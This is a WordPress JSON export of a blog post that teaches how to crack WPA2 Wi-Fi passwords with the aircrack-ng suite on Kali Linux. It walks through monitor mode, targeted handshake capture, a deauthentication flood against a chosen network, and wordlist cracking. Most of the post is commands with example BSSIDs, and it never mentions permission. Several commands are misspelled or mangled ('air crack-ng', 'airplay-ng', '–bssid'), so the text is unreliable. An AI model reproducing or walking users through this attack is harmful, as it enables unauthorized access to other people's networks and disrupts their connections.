{"id":10282,"date":"2017-05-17T14:34:33","date_gmt":"2017-05-17T09:04:33","guid":{"rendered":"https:\/\/www.wikitechy.com\/technology\/?p=10282"},"modified":"2017-05-17T14:34:48","modified_gmt":"2017-05-17T09:04:48","slug":"hack-wi-fi-passwords-installing-kali-linux-android","status":"publish","type":"post","link":"https:\/\/www.wikitechy.com\/technology\/hack-wi-fi-passwords-installing-kali-linux-android\/","title":{"rendered":"How to Hack Wi-Fi Passwords by Installing Kali Linux On Android"},"content":{"rendered":"<p>After android rooted in the event that you attempt Kali Linux on android then you can hack Wi-Fi passwords with rooted android with best Wi-Fi hacking traps for android 2017. Perused the total article to see the technique.<\/p>\n<h4 id=\"how-to-hack-wi-fi-passwords-by-installing-kali-linux-on-android\"><span style=\"color: #993300;\"><strong>How to Hack Wi-Fi Passwords by Installing Kali Linux On Android<\/strong><\/span><\/h4>\n<p>Cracking WPA2Wi-Fi password is not an easy task, so now o can hack it with a click where you don\u2019t need any software for this.<\/p>\n<p><strong><label class=\"label label-success\">Step 1<\/label><\/strong>&#8211; Kali Linux or any Linux system with air crack-ng installed<\/p>\n<p>a- if you don\u2019t have air crack-ng suite get it by this commend in terminal<\/p>\n<p style=\"text-align: center;\"><code>sudo apt-get install air crack-ng<\/code><\/p>\n<p><strong><label class=\"label label-success\">Step 2<\/label><\/strong>&#8211; a wireless network adapter that support monitor mode like<\/p>\n<p>a- Alfa 2W AWUS036NH<\/p>\n<p>b- Alfa AWUS036H<\/p>\n<p>c-Wi-Fi y-city 56G<\/p>\n<p><strong><label class=\"label label-success\">Step 3<\/label><\/strong>&#8211; a word list comprising of all the possible different combination of pass-phrases<\/p>\n<p>Now let\u2019s get to work<\/p>\n<p>I will be using Wi-Fi y-city 56G card on Kali Linux 2 Sana<\/p>\n[ad type=&#8221;banner&#8221;]\n<p><strong><label class=\"label label-success\">Step 1)<\/label><\/strong> open up your terminal as root and type<\/p>\n<p style=\"text-align: center;\"><code>ifconfig<\/code><\/p>\n<p>this will display you all the networking interfaces that are connected to your device.<\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"size-full wp-image-10295 aligncenter\" src=\"https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/1-122.png\" alt=\"How to Hack Wi-Fi Passwords by Installing Kali Linux On Android\" width=\"400\" height=\"321\" srcset=\"https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/1-122.png 400w, https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/1-122-300x241.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" \/><\/p>\n<p>If your wireless network adapter is working fine you should see the\u201d wlan0\u201d the name may change if you have more than one connected wireless adapter.<\/p>\n<p><strong><label class=\"label label-success\">Step 2)<\/label><\/strong> now to start monitor mode type<\/p>\n<p style=\"text-align: center;\"><code>airmon-ng start wlan0<\/code><\/p>\n<ul>\n<li>\u2018airmon-ng\u2019 is a traffic monitoring tool<\/li>\n<li>\u2018wlan0\u2019 is your wireless interface<\/li>\n<\/ul>\n<p>after this command, we started the monitor mode<\/p>\n<ul>\n<li>As we know that the monitor mode is working under wlan0mon, so this is your card name for now<\/li>\n<li>In the red area, a list of process id\u2019s that cause trouble during the process so kill those processes by typing<\/li>\n<\/ul>\n<p>kill &lt;pid&gt;<\/p>\n<p>So, according to me:<\/p>\n<p>kill 743 898 1070 1071 1081<\/p>\n<ul>\n<li>Now type ifconfig and this will display the newly set monitoring interface i.e., wlan0mon. in most case, it will be mon0.<\/li>\n<\/ul>\n[ad type=&#8221;banner&#8221;]\n<p><strong><label class=\"label label-success\">Step 3)<\/label><\/strong> to show list of available Wi-Fi network type<\/p>\n<p style=\"text-align: center;\"><code>airodump-ng wlan0mon<\/code><\/p>\n<p><img decoding=\"async\" class=\"size-full wp-image-10296 aligncenter\" src=\"https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/2-124.png\" alt=\"How to Hack Wi-Fi Passwords by Installing Kali Linux On Android\" width=\"400\" height=\"278\" srcset=\"https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/2-124.png 400w, https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/2-124-300x209.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" \/><\/p>\n<ul>\n<li>airodump-ng is a Wi-Fi packets capturing tool<\/li>\n<li>wlan0mon is my\u00a0monitoring interface<\/li>\n<\/ul>\n<p>airodump-ng\u00a0will start capturing all packets and from the captured packets<\/p>\n<p>select your target and note its \u2018bssid\u2019 (bssid = base service set identifier) and channel<\/p>\n<p>then stop the capture using \u201cctrl+c \u201c.<\/p>\n<p><strong><label class=\"label label-success\">Step 4)<\/label><\/strong> Start capturing the packets of your target network type the following command<\/p>\n<p style=\"text-align: center;\"><code>airodump-ng -c &lt;channel&gt; -w &lt;name&gt; \u2013bssid &lt;bssid&gt; wlan0mon<\/code><\/p>\n<p>i.e.:\u00a0 airodump-ng -c 2 -w Wi-Fi\u00a0 \u2013bssid C0:4A:00:F0:F4:24 wlan0mon<\/p>\n<p><img decoding=\"async\" class=\"size-full wp-image-10297 aligncenter\" src=\"https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/3-105.png\" alt=\"How to Hack Wi-Fi Passwords by Installing Kali Linux On Android\" width=\"400\" height=\"167\" srcset=\"https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/3-105.png 400w, https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/3-105-300x125.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" \/><\/p>\n<p>this will start the capturing of packets.<\/p>\n<p>and if you get the handshake you won\u2019t need the airplay command\u2026<\/p>\n<p>if you don\u2019t get the handshake yet<\/p>\n<p>while the capturing of packets goes on, open a new terminal as root and type<\/p>\n<p style=\"text-align: center;\"><code>airplay-ng -0 0 -a &lt;bssid&gt; mon0<\/code><\/p>\n<ul>\n<li>airplay-ng = tool for DE authentication, fake authentication and other packet injections,<\/li>\n<li>-0 = number associated for DE authentication,<\/li>\n<li>0 = dearth count,<\/li>\n<li>-a = bssid) here we are trying to send a DE authentication request.<\/li>\n<\/ul>\n<p>According to me, the command looks like<\/p>\n<p style=\"text-align: center;\"><code>airplay-ng -0 0 -a C0:4A:00: F0:F4:24 wlan0mon<\/code><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-10298 aligncenter\" src=\"https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/4-103.png\" alt=\"How to Hack Wi-Fi Passwords by Installing Kali Linux On Android\" width=\"400\" height=\"117\" srcset=\"https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/4-103.png 400w, https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/4-103-300x88.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" \/><\/p>\n<p>After few seconds stop it using ctrl+c.<\/p>\n<p>Then after we have successful captured the wpa handshake<\/p>\n[ad type=&#8221;banner&#8221;]\n<p><strong><label class=\"label label-success\">Step 5)<\/label><\/strong> Stop the capturing using ctrl+c and type \u201cls\u201d that would bring up all the current directories and files.<\/p>\n<ul>\n<li>Select the file with \u201c.cap \u201cextension and type the following command<\/li>\n<\/ul>\n<p style=\"text-align: center;\"><code>air crack-ng -w &lt;full location of the word list&gt; &lt;name of the file&gt;<\/code><\/p>\n<p>air crack-ng is a tool that helps in cracking the password<\/p>\n<ul>\n<li>In my case the command looks like<\/li>\n<\/ul>\n<p style=\"text-align: center;\"><code>air crack-ng -w \/usr\/share\/wordlists\/more_than_8.txt ********-01.cap<\/code><\/p>\n<p>For the Wordlist Check this Post Best Password dictionary<\/p>\n<p>Now it starts finding suitable passphrase and now all you have to do is wait till you see the lovely news (KEY Found\u00a0(your key is here) all Step in few lines<\/p>\n<p>.<img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-10299 aligncenter\" src=\"https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/6-91.png\" alt=\"How to Hack Wi-Fi Passwords by Installing Kali Linux On Android\" width=\"400\" height=\"185\" srcset=\"https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/6-91.png 400w, https:\/\/www.wikitechy.com\/technology\/wp-content\/uploads\/2017\/04\/6-91-300x139.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" \/><\/p>\n<p><strong><label class=\"label label-success\">Step 1)<\/label><\/strong> airodump-ng wlan0mon<br \/>\n<strong><label class=\"label label-success\">Step 2)<\/label><\/strong> airodump-ng -c 9 -w Wi-Fi \u00a0 \u2013bssid C4:6E: 1F:F6:34: B8 wlan0mon<br \/>\n<strong><label class=\"label label-success\">Step 3)<\/label><\/strong> airplay-ng -0 0 -a C4:6E: 1F:F6:34: B8 wlan0mon<br \/>\n<strong><label class=\"label label-success\">Step 4)<\/label><\/strong> air crack-ng -w \/usr\/share\/wordlists\/more_than_8. txt Wi-Fi -01.cap<\/p>\n","protected":false},"excerpt":{"rendered":"<p>How to Hack Wi-Fi Passwords by Installing Kali Linux On Android &#8211; Hacking &#8211; hack Wi-Fi passwords with rooted android with best Wi-Fi hacking traps.<\/p>\n","protected":false},"author":2,"featured_media":19621,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1791,29859,18379],"tags":[28901,30479,28903,30475,30472,30476,28899,28910,30466,30468,30482,30473,30481,30478,30477,30469,30483,28900,27869,30474,30467,30484,30471,30470,30480],"class_list":["post-10282","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-android","category-hacking","category-internet","tag-hack-wifi-kali-linux","tag-hack-wifi-using-kali-linux-or-backtrack-linux-free-wifi-password-crack","tag-hack-wifi-with-kali-linux","tag-hacking-with-kali-linux","tag-how-to-hack-wi-fi-passwords-by-installing-kali-linux-on-android","tag-how-to-hack-wifi-passwords-by-installing-kali-linux-on-android","tag-how-to-hack-wifi-using-kali-linux","tag-how-to-hack-wifi-with-kali-linux","tag-kali-linux","tag-kali-linux-android","tag-kali-linux-android-download","tag-kali-linux-android-hack","tag-kali-linux-android-tools","tag-kali-linux-android-wifi-hack-apk","tag-kali-linux-android-wifi-hack-download","tag-kali-linux-for-android","tag-kali-linux-for-android-apk","tag-kali-linux-hack-wifi","tag-kali-linux-hacker","tag-kali-linux-hacking-tutorials","tag-kali-linux-wifi-hack","tag-kali-linux-wifi-hack-apk","tag-kali-wifi-hack","tag-linux-kali","tag-sudo-apt-get-install-aircrack-ng"],"_links":{"self":[{"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/posts\/10282","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/comments?post=10282"}],"version-history":[{"count":0,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/posts\/10282\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/media\/19621"}],"wp:attachment":[{"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/media?parent=10282"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/categories?post=10282"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wikitechy.com\/technology\/wp-json\/wp\/v2\/tags?post=10282"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}